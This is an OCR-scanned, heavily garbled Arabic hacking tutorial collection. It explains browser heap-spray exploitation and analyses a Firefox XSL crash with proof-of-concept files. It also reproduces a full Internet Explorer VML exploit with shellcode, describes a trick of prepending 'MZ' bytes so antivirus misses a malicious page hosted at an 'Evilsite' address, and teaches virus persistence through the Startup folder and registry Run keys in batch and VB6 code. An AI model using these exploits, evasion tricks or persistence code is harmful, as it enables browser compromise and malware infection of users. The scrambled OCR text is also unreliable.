كما تلاحظ المتغير روإمء يحيوي القيمة 0 هبعد ذلك سي٣يقوم‏ في البداية بتكوين متغير يحوي 
بينات ذات طول كبير بطول 851968 (0 10000 >بالنظام السداسي عشر) بايت ومنثم حجز 
مصفوفة في الذاكرة في السطر التالي: 


memory = new Array(Û; 


ثم يتم ملئها بحيث يراعا في ذلك نسخ 851968 بايت لها زائد الشل كود مما يشكل لنا 100 بلوك بها 
0 + 40۸04الشل كود و هذا ما سيؤدي بالفعل إلى توسع كبير وصولا إلى العنوان 

4 0×04لجعله مکان متاحا في الذاكرة»شاهد الصورة للبيانات التي تم کتابتها في الذاكرة 
والتي نتج عنها ايجاد او جعل العنوان 0×0401020a‏ الذي سيحوي الشل كود الخاص بنا: 


لاحظ فوق ستجد العنوان 0۸17۳۴۴۸4 و هذا عنوان قریب نسبیا من 0×0۸0۸0۸0۸ وسیواصل 
عملية إنشاء »م81 حتى يصل او يفوت العنوان المطلوب ستجد ذلك في الصور تحت 
ربما يتسائل البعض ما فائدة 0۸0۸0۸0۸4 الموضوعة في المتغير روامء وهل لهذا دخل مع 
العنوان الذي سينقل التنفيذ؟ 
الجواب هو تخيل انك لو استعملت عنوان غير العنوان هذا ولنفرض مثلا 53629123 هذا 
العنوان»نحن نعلم ان ٤۸×‏ سيشير إلى 040a0aھ0‏ لأننا جعلناه كذلك في |ص)ط. MN‏ ۴۸۸ 1 بوضع 
&2570#&;2570#في اول اربعة بايت للهوست»الآن سنواجه التعليم: 

MOV ECX,DWORD PTR DS:[EAX] 


التي ستنقل عنوان الشل كود الخاص بنا هذا يعني انه يجب ان يكون العنوان 0×53629123 الذي 
يحوي الشل كود في العنوان 0201040 فتصبح التعليمة كالتالي: 
MOV ECX,DWORD PTR DS:[0a0a0a0a]‏ 


المكان 04040204 به 0×5362909۴ ومنه E٤×‏ سیصبح 0×5362909۴ وبعد اضافة "84 
لأن الإتصال يكون '"' 84+×] ينتج لنا عنواننا 53629123 ونكون في الشل كود الخاص بنا. 
تنویه: 

لکن الأمر ليس بهذه البساطة لأن عملية ملا الكومة او توسیع الذاكرة ب رجام S‏ pعِH‏ سیكون 
صعب وسیتم فيه اتخاذ اشياء بعين الإعتبار منها طول المتغير مء کم سیکون حجمه يعني 
تستلزم حسابات دقيقة > وكما يعلم كلنا ان الحسابات الدقيقة في اغلب الأحيان تنتج لنا إستثمارات 
غير مستقرة وهذا راجع إلى متغيرات كثيرة واكبر دليل على ذلك وجود تعليمة N0۲‏ و إستعمالها 
في الإستذمارات لعدم معرفة المكان بالضبط والخوف من تغيرات موجودة في النظام ستقلب 


الإستثمار رئسا على عقب»انا لا اقول ان هذا امر مستحيل فهو ممكن» لكن لما اترك الطريق السهل 
واتوجه للطريق الصعب. 
الآن ماقمنا به هو: 
-1كتبنا على مؤشر كائن موجود في الذاكرة وبالتالي ضمنا السيطرة على المسجل ×۸ وبالتالي 
×۳ 5وبالتالي تشغيل الكود عن طريق إلإتصال84+EAX CALL‏ 
-2يجب ان نجعل من المكان 0 0۸0۸0۸0۸4×مكانا متاحا في الذاكرة لكي نقوم بإاستخارج عنوان 
الشل كود منه عن طريق تıiۂ.SPR۸AY HEAP‏ 
-3بإستعمال هذه الأخيرة تمكننا من جعل العنوان 0 0۸0۸0۸04×متاحا وذلك بحجز مكان كبير 
وملأه ب القيمة ۸.0 
-4سبب إستعمال 0 ۸هو كونها تشبه تعليمة N0۶‏ في عملها لذلك لن نقلق من تشغيل الشل كود 
واختلاف المكان والخوف من تغيرها. 
-5عندما يتم نقل محتويات المسجل ×۸[ الذي يشير الآن إلى 0×0۸0۸0۸04 إلي ٤٤×‏ 
سيصبح 0 0۸0۸0۸0۸×لأن العنوان الذي کان يشير له ×۸ کان يحوي القیم 0. ۸ 
-6الإتصال ل 84+ ٤٤×‏ سيكون إِلى. 0x0۸0۸0۸8۴‏ 
-7سنجد عند ذلك المكان القيم 0 ۸والتي تعتبر تعليما تشبه N0۶‏ اي لها نفس العمل»وكما قلنا أنه 
بعد محتويات المتغير رهإمء حتما سيأتي الشل كود كما توضحه هذه العبارة: 

memory[i] = spray + shellcode; 


اي اننا سنتدحرج حتا نصل إلى الشل كود وها هو ذا كما توضح الصورة: 


وكما تلاحظ إلى العنواين فكلها تأتي بعد 0 0۸0۸0۸0۸×وهذا دليل على اننا حتما سنصل إلى 
الشل كود وسيتم تشغيله وبهذا كنا قد شرحنا الإستثمار والثغرة خطةر بخطوة و الآن سنأتي للتلاعب 
بالإستثمار بطريقة سهلة جربتها انا وقد تخطيت بها الكاسبر سكاي 2009 آخر تحديث. 

بناء إستثمار متغيربطريقة سl: Variant Exploit‏ 

لو تتذكر ما قلنه سابقا انه يوجد هنالك وسمين اختارهما مكتشف الثغرة هما × و- ° مؤطران بالون 
الأخضر-بما انهما من اختيار المبرمج فسنختار نحن ايضا وسمين آخرين ونرى ماذا سيحدث. 
مانغيره هو: 

<×>إلی <۴>ونغیر <)>إلى ٤<‏ >ثم نغير ما هو مكتوب امام H .J!| DA TAFLD‏ 

الآن نجرب الفحص بالكاسبر سكاي»نفحص الأصلي اولا شاهد النتيجة: 


والآن بعل التعديل: 


هنالك شيئ آخر هو اني لما فحصت في 1ه٤هآءں۷1۲‏ الأصلي كانت النتيجة 14 وعندما عدلت نزلت 
إلى 4»وهذا هو الرابط: 

وبهذا نكون قد انهينا الموضوع ارجوا ان تكونوا قد اخذتم اكبر قدر ممكن من المعلومات الأمر صعب 
قليلا لذلك عليك التركيز والإجتهاد للفهم اكثر. 

هذا يعتبر جهد شخصي قد يكون معرض للخطاً فالنقاش وتصحيح الأخطاء مقبول. 

والصلاة والسلام على النبي المختار صلى عليه عليه وسلم. 

والموضوع مهدى لإخواننا في غزة المجاهدين منهم و الصابيرين اللهم انصرهم وهز عرش ع 


تحلیل تثغرة [یء× Firefox‏ : 

اردت ان اعرج و اشرح شيئ مهم وهو ثغرة الفايرفوكس التي ظهرت ي الآونة الأخيرة. 

ولربما كثر التصعيد عليهاا بأنها ثغرة خطيرة قد تهدد الأمن الشخصي للمستخدمين»طبعا وبغخض 
النظر عن نوعية الثغرة فانها تعتبر خطيرة إذا توفرت شروط أخرى. 

لكن انا اقول حسب تحليلي البسيط أن عملية إستغلال الثغرة الموجودة في هذا الرابط مستحيل بشكله 
الحالي وسأوضح بعد قليلءفلو ان عملية الإستثمار الثغرة كانت سهلة لإستثمر ها من وضعها في ميل 
وورم فهو معروف 

Mozilla Firefox XSL Parsing Remote Memory Corruption P0C الثغرة الأوذى‎ 
Oday 

تعريف: 

الثغرة هي عبارة عن خطأ في معالجة ملفات S1‏ بالتحديد أثناء تحويل مستند ×١1‏ بواسطة 
XSLT‏ 
ماھو XSL:‏ 

بكل بساطة هي لغة تساعدك على عرض ملفات ا[ XM‏ بالشكل الذي ترغب فيه أنت. 
لنفرض أنه لديك ملف 11× وترید معالجته عن طریق تطبیق (م مھ ط٥س‏ )معین» لکن آلا تری أن 
التعامل معه سيكون صعب حتى بالتعامل مع مءإهم لذلك قام المطورون بتطوري لغة برمجة 
تساعدك في عرض ابيانات الموجودة في 11× بشكل الذي ترغب. 
XSLT :gala‏ 

بصفة عامة هي لغة تساعدك على تحويل مستند 11× إلى مستند آخر سواءا كان ×M1‏ او 

ML‏ او P۴‏ وهي تساعد كثيرا في عرض مستندات ۷11[× على الويب»و تعليمات لغة 
S[1×تكون‏ مضمنة في ملفات S1؟×‏ ويتم إستدعائها من داخلها. 


* % 
شاهد الصورة.‎ 
twESlralue-of > 
Trtle : Fame 
as: Uate :Feurdat 
>l r alya-o 
FETIL Fig EHSLT Code 


ESLT Protassor 


1 


FEesıft Dormer 


الصورة مWikipedia.j‏ 


فكما تشاهد هنا مستند ۷1× و كود ×S11‏ على اليمين والناتج هو مستند آخر ومن الممكن أن 
يكوني )×ع) ”ھام للعرض أو حتآ٣._XML×‏ 
نعود للثغرة كما قلنا أن الثغرة عبارة عن خطأ في معالجة ملفات 51× بالتحديد أثناء التعامل مع 
أكواد 51× لتحويل مستند 11× إلى نص قابل للعرض. 
نلقي نظرة على الكود. 
کود ئف xmlcrash.xı]‏ 
<?xml version='""1.0''" encoding=''UTF-8''?>‏ 
<?xml-stylesheet type=''text/xsl"' href=''xslt.xs]''?>‏ 
<root xmlns:xsi='"'http://www.w3.org/2001/XMLSchema-instance''>‏ 
<item1 id="AAAAAAA'"' />‏ 
<item2 id="AAAAAAAAA"' label="'AAAAAAAAAAAA'"'/>‏ 
</root>‏ 


×S؟] کود ملف‎ 
xslt.xsl 
<?xml version='""1.0'" encoding=''UTF-8''?> 
<xsl:stylesheet version=''2.0"" 
xmlns:xsl='"'http://www.w3.org/1999/XSL/Transform''> 
<xsl:key name=""'label'' match='"'item2'" use=''w00t0''/> 
<xsl:template match='"'root''> 
<xsl:for-each select='"//item1''> 
<xsl:call-template name="'item1'" /> 
</xsl:for-each> 
</xsl:template> 
<xsl:template name="'item1''> 
<xsl:for-each select=''key('label', 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA۸^A')'"'> 
</xsl:for-each> 
</xsl:template> 
</xsl:stylesheet> 


طبعا الكود الثاني هو الذي يحدث الخطأ. 
نتطرق الآن لشرح بسيط لللميكانيزم و عمل الثغرة. 
وكما قلنا سابقا أن ملفات ۷1× يمكن أن تستعمل ملفات 51× من أجل عرض محتوياتها لذلك 
فالغة 1× هي Sty1e She‏ الخاص بأ XML‏ 
كما ترون في الكود الأول أن تم إستدعاء ملف [و×.)[و× هنا: 
<?xml-stylesheet type=''text/xsl"' href=''xslt.xs]''?>‏ 


لكي يتم تطبيق الستايل على 
<item1 id="AAAAAAA'""' />‏ 


<item2 id=" AAAAAAAAA""' label="AAAAAAAAAAAA'"'/> 


ويعرضهم طبقا للكود المكتوب داخل ملف. 1؟S×‏ 
الكود المكتوب فوق ليس إلا مجموعة من يمه لها جذر رئيسي إسمه٤مه٠‏ › وبها تلك الحروف 
مع العلم انه يمكن أن تكون حروف او اسماء أخرى وكملاحظة فان المحارف 
"۸۸۸۸۸۸ "ليس هي التي تحدث الخطأً 
ننتقل لکود ا؟× 
لن أرشحه بالتفصيل فذلك يتطلب مني شرح تعليما لغة 1؟× لكن سأحاول الإختصار. 
طبعا لا بد انك قد إطلعت على لغة برمجة معينة كنت قد رأيت فيها التعليمات مثل ۲ه و f0٣‏ 
if .s...each‏ 
فالأمر ينطبق على هذه اللغة لكن بشكل مغاير في كتابة العبارة البرمجية فقط, 
فكما تلاحظ تعليمة طعھع.... اه تم كتابتها بالشكل التالي 
<xsl:for-each‏ 


و التي تنتهي ب: 
<jxsl:for-each>‏ 


وبعدها ٤ء‏ ع[عء التي تحدد مكان تطبيق الأمر في مستند. XML‏ 
بعدها يأتي الأمر 
<xsl:call-template name='"'item1'"" />‏ 


الذي يستدعي ءادامم.ع) التالي: 
<xsl:template name="'item1''>‏ 
<xsl:for-each select=''key('label',‏ 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA۸A۸A۸A')'"'>‏ 
</xsl:for-each>‏ 
</xsl:template>‏ 


هنا يقوم هذا ٠٤هام‏ م_ع) باستعمال الدالة رم التي تقوم بعمل عم ذ×ء ل1 للفروع الخاصة ب مسند 
M1×فتخيل‏ أن مستند .11× كبير جدا وبه فروع كثيرة وأرقام وأعداد كثيرة فإن عملية إنشاء 
الأسماء الدلالية ستساعد في التعامل مع المستند ويتم ذلك بإستعمال الدالةرمk‏ »فمثلا عملية 
عin×ع‏ قفي الكتب › لنفرض أنك تبحث عن كلمة او عبارة ستتوجه لل) عل و ليس 
(n)e14دءوسيعطيك‏ رقم الصفحة التي يمكن أن تجدها فيهاء و الأأمر ينطبق على ملفات 1اXM×‏ 
بحيث انك تعطيه الإسم وهو يعطيك العقدة و العنصر بالضبط. 
المشكلة موجود في هذا الكود بطريقة غير مباشرة» لأنه في البداية تم الإعلان عن رمk‏ في هذا 
السطر: 


<xsl:key name=""'label'' match='""'item2'' use=''w00t0''/> 


عند الأإعلان عن رم] یتم اخذ ثلاث نقاط بعين الإعتبار: 
1- الإعلان عن إسم ررم] وذلك بكتابة''=ع هم إسم المفتاح'"' 


2- الخاصية الثانية هي طءهص يعني بها تحديد العقدة (مdه0م)‏ المراد عمل عمرذ×ملم لها. 
3-6و هي التي تجعل المفتاح اكثر تخصيصا بحيث يمكن من خلالها تعين عنصر من العقدة 
الرئيسية التي تم إختيارها في.طإءوم 

لكن في كود الإستغلال لم يتم تحديد مء بشكل صحيح لكن تم وضعها بشكل عشوائي وهنا يحدث 


الخطاً. 

لكي تتأكد جرب وإستبدل 0060س ب لا شيئ يعني دعها فارغة وسترى ماذا سيحدث. 
إذا هنا المشكلة. 

لقد قمت ببعض التعديلات على الكود فجعلته بهذا الشكل (إختصرته.( 
xmlcrash.xml.‏ 


<?xml version='""1.0''" encoding=''UTF-8''?> 

<?xml-stylesheet type=''text/xsl"' href=''xslt.xs]''?> 

<root xmlns:xsi='"'http://www.w3.org/2001/XMLSchema-instance''> 
<item1 id='"'datasniper'" /> 

</root> 


xslt.xsl 
<?xml version='""1.0''" encoding=''UTF-8''?> 
<xsl:stylesheet version=''2.0"" 
xmlns:xsl='"'http://www.w3.org/1999/XSL/Transform''> 
<xsl:key name='"'label'' match='""'item1'' use='"''/> 
<xsl:template match=''root''> 
<xsl:for-each select=''key('label', @item1)''> 
</xsl:for-each> 
</xsl:template> 
</xsl:stylesheet> 


بعد تجربة الكود الموجود في أول الدرس سترى مثل هذه الصورة. 


U - maîn thread, module xul] | 
[GJ Fie Yiem Debug Plugins Options Window Help Tools EreakPoint-= لا‎ 


EBEZEBEE| 54 ي كما تلاحظون هنا محاولة‎ 
EBEZEEES CALL Hu l.EBBELEEF ا اچ چ‎ AA1SFTAL 
HOY) EC#, DUORD FTR DOS: CESI+58] الإنتقال بإاستعفاك تعليمة‎ # BBZEBH4B 

CHP _EL#, EDT CALL I ELLLLLLD 


{OU ERK, DUORD PTR DS: CEC] الى مان غير موحود مما ادف‎ Ek 
CALE DUORD FTF DS:TER#] الى جوب یا‎ g813FEEO 


em BBBBBRBS 

وقدا مانسير اليه المسحل ROR EEBxX, EB#‏ 

: CMF OuDAD PTR OG: [ES1+4C1,EDI EAX GABZEBCS Hu |. EBBZEBCS 
éAEBZEBDA JLE SHORT xul. EOBZEEFT 2 ِ : 2 ES BA23 32bit BLFFFFFFFF 
EBBZEEDZ HOW ERK, DUORU PTR US: CEST+441 ورالعيارة رقي الأسقل توضح ذلك‎ E O 
BBZEEBDS LER ERK, DWORO PTR OS: CEAK+EDI+E] E E 
E E BERE MEE EES " û DS 0023 32bit BLFFEFFFFF 
EHBZ it إ7‎ 

EBBZEBUE HOU ERK, DUORÛ PTR DS: LEN#1 ي ا‎ 
GOEEEED OU EC, DUORD PTF D6: [ERA] 

EBBZEEE: 
EAEZEBES TALE DUORD PTR 05: CEC#+E] LastErr ERROR SUCLEES He 
EABZEEEE| BBE 44 OL ERK, DUORO PTR OS: CESI+441 ABIRZRZ (NO, NB, HE, A, NS, PF 
EABZEEEI| 836438 28 4 | ANO DWORD PTR OS: TERX+EDT+BE1, 4 

EABZEBEE| 43 INC EEK EE 

EABZEEEF| 42C7 18 EDT, 10 E 

EBBZEEF2| SESE 4C CHF EEX, DUORO PTR O8: CEST+4C1 E 

EBBZEBFS|^ 7E _DE ا‎ E 

EBBZEEFT| FF7E_44 PUSH DWORO PTR OS: [ESI+44] 


O e 

EHEZ , 1 

D46 1C LEA ER, DUORO FTR O5: LESI+1C] ا‎ 
OF EC | 


B3 8 
S24d2d 1d PO! EA™ dlZêz Lond dH d4 H1 Err 


EBBZECEC)| BD4424 16 LEA EA, E SS EREY EE 


EéBBZECIA} 54 FUSH EA# 
EBBZEL11| E8 FESECBFF | EAU 


SEELELLLEFÎ 
SHEA 1 
REE 
AB13FE3| BHBABGAA 
HA13FE34| HAHAHAHA 
HH13FE38| SASBAS3] | RETURN to mul. éHéBAS31 
AA13FE3C| A34Fé118 
HA13FE44| SAA3EIEE) RETURN to nul. EAASELEE fron Hu Ll, ASEASZS 
AA 13FEB44| FAI 3FLS4 
GOBZF 1L2 RETURN to ul. 6OBAFICE from xul. 6ABZEBSD 


كما تلاحظ الشرح المكتوب في الصورة لأن عملية الأنتقال للمكان الموجود في ×5۸ باءت بالفشل 
لعدم إحتواء ×8۸ على, مكان 4 اهب او مكان متاح في الذاكرة. 

وهذا معروف بكثرة فيل د ثغرات المتصفحات و للإطلاع أكثر أدخل هذا الرابط 

يشرح عملية تحليل ثغرة المتصفح و هي من نوع هذه الثغرات. 

في ذلك الدرس كنت قد تناولت موضوع رهامء مجءط و سأنقل جزءا من ذلك: 


فتخیل لو أن الخطاً کان یحدث لما کون 0۸0۸0۸0۸-=× E۸‏ سيحدث نفس الخطاً وستظهر 
الرسالة التالية 
Access Violatiojn when reading [0A۸0A0۸A0۸]‏ 


فالأمر سهل وذلك بمجرد تضخيم الكومة والزيادة فيها عن طريق عملية الحجز فإن هذا العنوان 
سيصبح موجود وسيتم القفز إلى محتواه. 

لكن المشكلة وهو أن 00000000=× 4 لذلك فإن عملية عمزرهإم؟ مستحيلة فكلنا يعم أن 
العنوان 00000000 لا يمكن إستعماله من مله إعوں لذلك تبخر حلم الإستثمار. 

هنالك أمل لعمل إستثمار و هو التعديل على الكود وتغيره فلقد قمت ببعض التعديلات على الكود فتغير 


العنوان من 
0 إلى 00000031 بهذا التعديل: 
<?xml version='""1.0'' encoding='"'"'UTF-8''?>‏ 


<xsl:stylesheet version='"2.0"" 
xmlns:xsl='"'http://www.w3.org/1999/XSL/Transform''> 


<xsl:key name='"'label'' match='"'item1'' use='"''/> 


<xsl:template match=''root''> 
<xsl:for-each select=''key('label', @item1)''> 
</xsl:for-each> 
</xsl:template> 
</xsl:stylesheet> 
٤09۸0017 وغیرته إلى العنوان‎ 
×S؟1 بهذا الكود في ملف:‎ 
<?xml version='""1.0'" encoding=''UTF-8''?> 


<xsl:stylesheet version='""2.0"" 
xmlns:xsl='"'http://www.w3.org/1999/XSL/Transform''> 


<xsl:key name="'label'' match='""'item1'" use=''"''/> 
<xsl:template match='"'root''> 
<xsl:value-of select='"'key('label', @item1)''> 
</xsl:value-of> 
</xsl:template> 
</xsl:stylesheet> 


لمعرفه الكثير من الثغرات اقرا كتاب( الامن والحماية فى الانترنت) وهو موجود فى موقع 
کتب 


: ESET Smart Security Malicious WebPage Detection By موھیsةرغثلا نوع‎ 
ESET Smart Securityخصi‎ gيaج: الإصدارات المصابة‎ 

: DATA_SNIPER اكتف‎ 

تاريخ الإكتشاف 2008/08/15 : 

الخطورة :عالية جداا. 


شرح التقنية المستخدمة: 
تعتبر هذه الثغرة خطيرة جدا من ناحية انها قد تسمح بإدخال فيروسات وتنفيذ اكواد ضارة عن 
طريق تغرات المتصفح حيث تكمن هذه الثغرة في التلاعب بصفحات ۲111[ و التعديل عليها 
»والثغرة التي إكتشفتها اساسها مبني على على فكرة ''م)by ''The Magic of magic‏ لكنù‏ 
مع بعص الإضافات لکي تکون سارية المفعول مع برامج 65] ]1)1 الجديدة التي من بينها 
ESET Smart Security‏ 
The Magic of magic byte:‏ 
لقد ظهر هذا النوع من الثغرات بyاسطBayora Andrey‏ 
و التي سميت ب: 

The Magic of magic byte 


والتي تكون بإضافة هيدر الملفات التنفيذية الملفات التالية: 
BAT,JS,HTML‏ 


حسب ما يقول صاحب الموقع. 
مثلا هذا كود لإستثمار تثغرة في متصفح:6٤1‏ 
MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP‏ # 
SP2)‏ 
--!< 


.„::[ jamikazu presents ]::.. 

Microsoft Internet Explorer VML Remote Buffer Overflow Exploit 
(Oday) 

Works on all Windows XP versions including SP2 


Author: jamikazu 
Mail: jamikazu @ ***** com 


Credit: metasploit, Sky Lined 


invokes calc.exe If successful 


--< 
<html xmlns:v=''urn:schemas-microsoft-com:vml''> 


<head> 
<object id=''VMLRender'"" classid='""'CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E''> 


</object> 

<style> 

v\:* { behavior: url(#VMLRender); } 
</style> 

</head> 


<body> 

<script language='"'javascript''> 
var heapSprayToAddress = (x05050505; 
var payLoadCode = 


unescape('' % uESFC %u0044 % u0000 % u458B %uSB3C %u057C %u0178 
%uSBEF %u184F %uSFSB %u0120% u49EB %u348B %u018B Fou31EE % 
u99C0 %u8S4AC %ou74C0 %uC107 %u0DCA %uC201 %uF4EB %u543B % 
u0424 %uE575 %uSFSB %u0124 % u66EB %u0C8B % u8SB4B %u1C5SF %u 
EB(01 %u1C8B %u018B %u8S9EB %u245C %uC304 % uC031 %uSB64 %u3 
040 %uC085 %u0C78% u408B % u8SBOC %u1C70 %uSBAD %u0868 % u09E 
B%u808B %u00B0 % u0000 % u688B %uSF3C %uF631 %u5660 uF889 % 
uC083 %u507B %u7E68 %uE2D8 %u6873 uFE98% u0ESA %FouFF57 %u6 
3E7 %u6C61 %u0063'"'); 


var heapBlockSize = 0x400000; 
var payLoadSize = payLoadCode.length * 2; 


var spraySlideSize = heapBlockSize - (pay LoadSize+0x38); 


var spraySlide = unescape('' % u9090 %u9090'"); 
spraySlide = getSpraySlide(spraySlide,spraySlideSize); 


heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; 
memory = new Array(); 


for (i=0;ji<heapBlocks;i++) 


{ 
memory[i] = spraySlide + pay LoadCode; 


function getSpraySlide(spraySlide, spraySlideSize) 
while (spraySlide.length*2<spraySlideSize) 
spraySlide += spraySlide; 


spraySlide = spraySlide.substring(0,spraySlideSize/2); 
return spraySlide; 


} 


</script> 

<v:rect style='width:120pt;height:S8Opt' 
fillcolor='"'red''> 
<v:fill method = ''aa'' ></v:rect></v:fill> 


</body> 
</html> 


وباضافة الهيدر التالية إلى الملف لن يتم كشفه: 
MZ Oia as !..L.!This program‏ 
cannot be run in DOS mode....$‏ 


ولقد ذكر مكتشف الثغرة بعض برامج usاذہآ)‏ "۸ مصابة بها ولكن إصداراتها قديمة. 
هذا رابط يشرح الثغرة: 
http://www.securityelf.org/magicbyte.html‏ 


لكن هذه الثغرة تختلف فليلا + إضافة صغيرة وممكن تكون برامج عديدة مصابة بها . 

ما الفرق بينهاما؟ 

ثغرة م ر8 عأعه1 فعالة من ناحية انه الملفات المعدلة [5S‏ او 8^۸1 او H11۷‏ سيتم 
تشغيلها مباشرة "نقرتين على الزر الأيسر للفأرة " لكن للأسف هذا كان سابقا. 

النوع المعدل او المطور الذي اكتشفته في رازإuءعS‏ ١إوص؟‏ مء فعال في حالة واحدة 
عند رفع الصفحة الملغمة على سيرفر ويتم عرض الصفحة عن طريق المتصفح وبعد ذلك 
هي بدورها '"ثغرات المتصفح" تشغل برمجيات واكواد ضارة »وكم هي كثيرة اليوم خاصة 
ثغرات + ×ع1۷)ء۸ أن هذا النوع من الثغرات حديث ومتوافق مع 156 فقط. 

إن لم تفهم إقراً الشرح. 

شرح الثغرة: 

بعد بعض التحلیل توصلت إلی ان E٥٤ S٣2۲۲ Secu ٤y‏ يقوم بعملية فحص الملفات 
وذلك عن طريق معرفة نوع الملف» مثلا إذا وجد البرنامج ان هذا المف ليس تنفيذي لمذا 
يقوم بإستعمال توقيعات الملفات التنفيذية""فيروسات-ديدان" والعكس إذا وجد ملف تنفيذي 
لماذا يقوم بفحصه بواسطة توقيعات الفيروسات و الثغرات من نوع M1]‏ 1] هنا يكمن 
اللغز 

لكن السؤال كيف يتعرف الانتي فيروس على الملف؟ 

سهلة ..عن طريق البيتاتا السحرية او مقدمة الهيدر و الإمتدادات. 

لذلك لن تنجح معك الطريقة إذا قمت بالتالي.: 

-1إضافة ھیدر ال EXE ۴ ¡[e‏ لملف ۲M‏ ]٢إ‏ و!إبقاء إمتداد ہtط‏ او ا٤ط‏ او.کز 
-2تغير إمتداد الصفحة الملغمة إلى ×۴٤‏ وعدم إضافة الهيدر او البايتات السحرية 
"MZ".‏ 

ارئيت إذن هنالك شطرطين في التعريف. 

الإمتدادءالبايتات السحرية. 

مثلا صفحات 111[ على سبيل المثال يتعرف عليها بالشكل التالي: 

htn]. -الإمتداد‎ 

-البيتات السحرية الخاصة بال 6sا¡F۴ HTML‏ هي ''<*<'' والتي HTML J‏ 

" ۲۸6 هذا مثال فقط وتحليل توفيقي فقط توصلت انا له ولیس موثق."'" 

الان وصلنا للجزء الأهم ماذا سنفعل لكي نتخطى الكشف. 

سنقوم بإضافة البيتات السحري الخاصة بالملفات التنفيذية ".7" او الهيدر التالي 


oT 1‏ إ1 ل ك 

MZ@.........00000000 Oe e @...PE..L....X.G.... 
O 0..&........ @ .... @ 

او: 

MZ 


لبداية الصفحة وحفضها.. افحصها الان» في رايك هل سيتم كشف الإستثمار او الصفحة 
الملغمة ...طبعا نعم لأن الشرط الأول غير محقق يجب تغير الإمتداد إلى )×٤‏ او سنقوم بعدم 
وضع إمتداد ومادام 56[] يقرأ الصفحة دون إمتداد فالامر جيد ومفيد › كان من الممكن ان 


تجعل إمتداده م×م لكنك ستواجه مشاكل لذلك لا تضع له إمتداد وقم برفعه على سيرفر معين 
وتصفحه بالشكل التالي: 
http://Evilsite.com/exploit‏ 


وسترى الكارثة الإکسبلويت تم تشغيلها والمستر ur¡)y›مS ESET Stupid‏ يشاهد. 
وكملخص البرنامج لن يكشف اي فيروس او إستثمار ثغرة مكتوب بال ۲1 ]1 إذا كان به 
البيتات السحرية ".17" و إمتدادہ غير إمتداد ML1]إ‏ او JS‏ او VBS‏ او PHP‏ المھم 
اي شيء له العلاقة بالسكريبتات لأني اظن انها معا في نفس قاعدة البيانات. 

الحلول: 

لا تستعمل 156 wlyتzعJa Firefox‏ ا۾. OPERA‏ 

وللأنترنت أكسبلورل نصيب في هذه الثغرة أيضا فيما يتعلق بخدعة الإمتدادات. 

سيتم إرفاق الفيدو المرة القادمة إن شاء الله و الذي يوضح خطورتها. 

الثغرة لم يتم تجريبها على الانتي فيروس الاخرى عدى الكاسبر لكنه غير مصاب بها. 

ارجو من الاخوة الذين تتوفر عندهم برامج مضادة اخرى ان يجربوها و يبلغوني 


بدايه عمل الفيرس فى الويند 
*اسلوب فیر وسات ملا s٣٤‏ 


start U]ڑږ ندر‎ -1 


وهو فولدر موجود فی هذا المسار (مر×) 
C:\Documents and Settings\ pدختwnll pwl \Start Menu\Programs\Startup‏ 


س ا س س 


Internet EKE indos Media Play‏ تی 


ld WinRAR. 
TJ AdAcbe Reader 7.0 
۱ 3 | ıı avast! Internat Sec 


lu ETSI um E ApnıEiwirL 


e MicrosaFE YWisuıal Basic ۳ E 


| lJ Aazaustica MixerafE 
ME SEE YWideao mode Eo OF 87 E SE ASE 


& Û uleraIsa 
I REuırı SCripE ™ 
Ad nıLiEE 


Ee RealPlayer 

dobe Reader 7.0 | Lu kia iEEKSEEÎEEN EE‏ أ 
LÛ videolan‏ - 

Microsoft OFFiZe fort EL a 

ld MicroBest CrackJock, 

ll RESOURCE HACEER. 


واليكم الاكواد الخاصه بلفيروسات بلغه الباتش (٤وط.)‏ طc٤aط‏ 
COPY batchfilename. bat %(USERPROFILE®% \Start~-1\Programs\Startup’‏ 


وهو يقوم بنسخ ملف الباتش الى فولدر مu٤۲هاء‏ 


AI Progranns J 


2- استخدام الرجستری 
وهوبرنامج مدمج مع النظام يقوم بعده مهام مثل التعريفات وبيانات المستخدمين وتشغيل برامج العمل 
مع اقلا الويندوز .......... الخ 


Type the name of a program, Folder, document, or 


lm Irternet resource, and Windows will open ik For ¥ou, 


pen: | regedit] e 


وأليكم مسار البرامج التى تعمل مع بدايه الويندوزالاكثر استخداما 


[HKEY MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
HKEY_ CURRENT _USER\Software\Microsoft\Windows\CurrentVersion\Run 


وهذه قائمة اخرى اقل شيوعا 
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce‏ 
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce‏ 
HKEY_ LOCAL _MACHINE\SOFTW ARE\Microsoft\Windows\Curr ent Version\Run‏ 
HKEY_ LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce‏ 


HKEY_ LOCAL MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx 


HKEY_ LOCAL MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices 


HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce 
والمسار الاتى يقوم بعمل فولدر( مفتاح) باسم «ںء ويضع بها قيمه بها المسار الفيرس وهذا المسار‎ 
لایظهرفی مں ۲ه للویندوز‎ 
HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows 
\CurrentVersion\policies\Explorer\run 


واليكم اكواد بلغه الباتش 


Reg add hkcu\software\microsoft\windows\currentversion 
\run /v M /t reg_sz /d '"'c:\xx.bat'"" 


Reg add hkLM\software\microsoft\windows\currentversion 
\run /v M /t reg_sz /d '""c:\xx.bat"" 
ملاحظة المقصود ب )/ نوع القيمة في الريجستري وبال 4/ مقدار القيمة‎ 
واليكم كود بلغه الفيجوال بيسك6‎ 
Dim R As Object 
Set R = CreateObject('' WScript.Shell"") 
Const Key = "HKLM\Software\Microsoft\Windows\CurrentVersion\run'"" 
R.RegWrite Key, 1, '"REG_SZ" 
R.RegWrite Key + '""'\sameh'"", ''c:\virus.exe'"" 
Set R = Nothing 


وأليكم أقوى طريقه لاستخدام الرجسترى للفيرس وهو العمل مع ملف ۵×ع.۲٠۲٥ام×ء‏ عن طريق امر 

